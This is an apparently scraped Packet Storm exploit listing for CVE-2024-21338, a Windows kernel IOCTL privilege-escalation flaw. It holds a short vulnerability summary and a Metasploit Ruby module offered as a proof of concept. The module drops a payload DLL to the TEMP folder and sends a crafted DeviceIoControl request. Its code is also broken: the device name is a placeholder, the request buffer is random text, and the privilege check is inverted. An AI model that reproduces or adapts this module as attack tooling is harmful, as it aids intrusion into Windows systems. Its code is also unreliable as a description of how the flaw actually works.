{“lastseen”:”2026-02-09T16:25:10″,”description”:”This Metasploit module exploits an insufficient access control vulnerability in the Windows Kernel through exposed IOCTL handlers. The vulnerability allows non-privileged users to access kernel-level functionality leading to privilege escalation…”,”published”:”2026-02-09T00:00:00″,”modified”:”2026-02-09T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 Microsoft Windows 11 Pro 23H2 Kernel IOCTL Access Control”,”source”:””,”references”:””,”id”:”PACKETSTORM:215117″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2024-21338″],”sourceData”:”=============================================================================================================================================\\n | # Title : Windows 11 Pro 23H2 Kernel IOCTL Access Control Vulnerability Exploit |\\n | # Author : indoushka |\\n | # Tested on : windows 11 Fr(Pro) \/ browser : Mozilla firefox 145.0.1 (64 bits) |\\n | # Vendor : System built\u2011in component. No standalone download available. |\\n =============================================================================================================================================\\n \\n POC : \\n \\n [+] References : https:\/\/packetstorm.news\/files\/id\/177869\/ \\u0026 CVE-2024-21338\\n \\n \\n [+] Summary : \\n \\n CVE-2024-21338 is a security vulnerability in the Microsoft Windows Kernel involving insufficient access control for IOCTL (Input\/Output Control) handlers. \\n This vulnerability allows non-privileged users to access kernel-level functionality that should be restricted, potentially leading to privilege escalation.\\n \\t\\t \\n Technical Details:\\n \\n Vulnerability Type: Insufficient Access Control\\n \\n Attack Vector: Local\\n \\n Privileges Required: Low\\n \\n Impact: Privilege Escalation\\n \\n \\n Affected Systems:\\n \\n Windows 10 (various versions)\\n \\n Windows 11 (various versions)\\n \\n Windows Server 2019\/2022\\n \\n Key Components:\\n \\n Vulnerable Component: Windows Kernel IOCTL handlers\\n \\n Attack Mechanism: Direct kernel object manipulation\\n \\n Exploitation: Through device driver interface\\n \\n Exploitation Flow:\\n text\\n \\n 1. Identify vulnerable IOCTL handlers\\n 2. Open handle to vulnerable device driver\\n 3. Craft malicious IOCTL requests\\n 4. Bypass access control checks\\n 5. Execute arbitrary code in kernel context\\n \\n Mitigation Strategies:\\n \\n Apply Security Updates: Install Microsoft January 2024 security patches\\n \\n Driver Whitelisting: Implement driver signature enforcement\\n \\n Access Control: Restrict access to device interfaces\\n \\n Monitoring: Monitor for suspicious driver activity\\n \\n Detection Indicators:\\n \\n Unusual IOCTL requests to kernel drivers\\n \\n Attempts to access privileged device interfaces\\n \\n Unexpected driver loading patterns\\n \\t\\n [+] POC : \\n \\n #############################################\\n # Exploit Title: Windows 10.0.17763.5458 Kernel IOCTL Access Control Vulnerability Exploit CVE-2024-21338\\n # Author: indoushka\\n #############################################\\n \\n require ‘msf\/core’\\n \\n class MetasploitModule \\u003c Msf::Exploit::Local\\n Rank = NormalRanking\\n \\n include Msf::Exploit::EXE\\n include Msf::Exploit::FileDropper\\n include Msf::Post::Windows::Priv\\n include Msf::Post::Windows::Process\\n \\n def initialize(info = {})\\n super(\\n update_info(\\n info,\\n ‘Name’ =\\u003e ‘Windows Kernel IOCTL Insufficient Access Control Vulnerability CVE-2024-21338’,\\n ‘Description’ =\\u003e %q{\\n This module exploits an insufficient access control vulnerability in the Windows Kernel\\n through exposed IOCTL handlers. The vulnerability allows non-privileged users to access\\n kernel-level functionality leading to privilege escalation.\\n },\\n ‘Author’ =\\u003e [‘indoushka’],\\n ‘License’ =\\u003e MSF_LICENSE,\\n ‘References’ =\\u003e [\\n [‘CVE’, ‘2024-21338’],\\n [‘URL’, ‘https:\/\/msrc.microsoft.com\/update-guide\/vulnerability\/CVE-2024-21338’],\\n [‘URL’, ‘https:\/\/nvd.nist.gov\/vuln\/detail\/CVE-2024-21338’]\\n ],\\n ‘Platform’ =\\u003e ‘win’,\\n ‘Arch’ =\\u003e [ARCH_X64],\\n ‘SessionTypes’ =\\u003e [‘meterpreter’],\\n ‘Payload’ =\\u003e {\\n ‘Space’ =\\u003e 4096,\\n ‘DisableNops’ =\\u003e true\\n },\\n ‘Targets’ =\\u003e [\\n [\\n ‘Windows 10\/11 x64’,\\n {\\n ‘Arch’ =\\u003e ARCH_X64,\\n ‘Platform’ =\\u003e ‘win’\\n }\\n ]\\n ],\\n ‘DefaultTarget’ =\\u003e 0,\\n ‘DefaultOptions’ =\\u003e {\\n ‘EXITFUNC’ =\\u003e ‘thread’\\n },\\n ‘DisclosureDate’ =\\u003e ‘2024-01-09’,\\n ‘Notes’ =\\u003e {\\n ‘Stability’ =\\u003e [CRASH_SAFE],\\n ‘Reliability’ =\\u003e [REPEATABLE_SESSION],\\n ‘SideEffects’ =\\u003e [ARTIFACTS_ON_DISK]\\n }\\n )\\n )\\n \\n register_options([\\n OptString.new(‘DEVICE_NAME’, [true, ‘Vulnerable device name’, ‘\\\\\\\\\\\\\\\\.\\\\\\\\VulnerableDriver’]),\\n OptInt.new(‘IOCTL_CODE’, [true, ‘Vulnerable IOCTL code’, 0x222003])\\n ])\\n end\\n \\n def check\\n \\n if sysinfo[‘OS’] !~ \/windows\/i\\n return CheckCode::Safe(‘Target is not a Windows system’)\\n end\\n \\n if sysinfo[‘Architecture’] !~ \/x64\/\\n return CheckCode::Safe(‘Target architecture is not supported’)\\n end\\n \\n unless is_system?\\n return CheckCode::Detected(‘User does not have SYSTEM privileges’)\\n end\\n \\n device_path = datastore[‘DEVICE_NAME’]\\n if device_exists?(device_path)\\n return CheckCode::Appears(‘Vulnerable device driver detected’)\\n else\\n return CheckCode::Safe(‘Vulnerable device driver not found’)\\n end\\n end\\n \\n def exploit\\n print_status(\\”Starting exploitation for CVE-2024-21338\\”)\\n \\n unless check == CheckCode::Appears\\n fail_with(Failure::NotVulnerable, ‘Target is not vulnerable’)\\n end\\n \\n print_status(\\”Generating payload…\\”)\\n payload_data = generate_payload_dll\\n \\n temp_path = \\”#{get_env(‘TEMP’)}\\\\\\\\#{Rex::Text.rand_text_alpha(8)}.dll\\”\\n print_status(\\”Writing payload to #{temp_path}\\”)\\n write_file(temp_path, payload_data)\\n register_file_for_cleanup(temp_path)\\n \\n print_status(\\”Triggering vulnerability via IOCTL…\\”)\\n if trigger_exploit(temp_path)\\n print_good(\\”Exploitation successful!\\”)\\n else\\n fail_with(Failure::Unknown, \\”Exploitation failed\\”)\\n end\\n end\\n \\n private\\n \\n def device_exists?(device_path)\\n begin\\n file = client.railgun.kernel32.CreateFileA(\\n device_path,\\n ‘GENERIC_READ’,\\n ‘FILE_SHARE_READ|FILE_SHARE_WRITE’,\\n nil,\\n ‘OPEN_EXISTING’,\\n ‘FILE_ATTRIBUTE_NORMAL’,\\n 0\\n )\\n \\n if file[‘return’] != client.railgun.const(‘INVALID_HANDLE_VALUE’)\\n client.railgun.kernel32.CloseHandle(file[‘return’])\\n return true\\n end\\n rescue\\n return false\\n end\\n \\n false\\n end\\n \\n def trigger_exploit(payload_path)\\n begin\\n \\n device_handle = client.railgun.kernel32.CreateFileA(\\n datastore[‘DEVICE_NAME’],\\n ‘GENERIC_READ | GENERIC_WRITE’,\\n 0,\\n nil,\\n ‘OPEN_EXISTING’,\\n 0,\\n 0\\n )\\n \\n if device_handle[‘return’] == client.railgun.const(‘INVALID_HANDLE_VALUE’)\\n print_error(\\”Failed to open device handle\\”)\\n return false\\n end\\n \\n buffer_size = 1024\\n input_buffer = Rex::Text.rand_text_alpha(buffer_size)\\n ioctl_result = client.railgun.kernel32.DeviceIoControl(\\n device_handle[‘return’],\\n datastore[‘IOCTL_CODE’],\\n input_buffer,\\n input_buffer.length,\\n nil,\\n 0,\\n 4,\\n nil\\n )\\n \\n client.railgun.kernel32.CloseHandle(device_handle[‘return’])\\n \\n if ioctl_result[‘return’]\\n print_good(\\”IOCTL sent successfully\\”)\\n return true\\n else\\n print_error(\\”IOCTL failed\\”)\\n return false\\n end\\n \\n rescue =\\u003e e\\n print_error(\\”Exploitation error: #{e.message}\\”)\\n return false\\n end\\n end\\n end\\n \\n Greetings to :=====================================================================================\\n jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|\\n ===================================================================================================”,”sourceHref”:”https:\/\/packetstorm.news\/download\/215117″,”cvss”:{“score”:7.8,”severity”:”HIGH”,”vector”:”CVSS:3.1\/AV:L\/AC:L\/PR:L\/UI:N\/S:U\/C:H\/I:H\/A:H”,”version”:”3.1″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/215117\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2026-02-09T16:25:10″,”description”:”This Metasploit module exploits an insufficient access control vulnerability in the Windows Kernel through exposed IOCTL handlers. The vulnerability allows non-privileged users to access kernel-level…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,28,12,15,13,53,7,11,5],"class_list":["post-39812","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-cvss-78","tag-exploit","tag-high","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n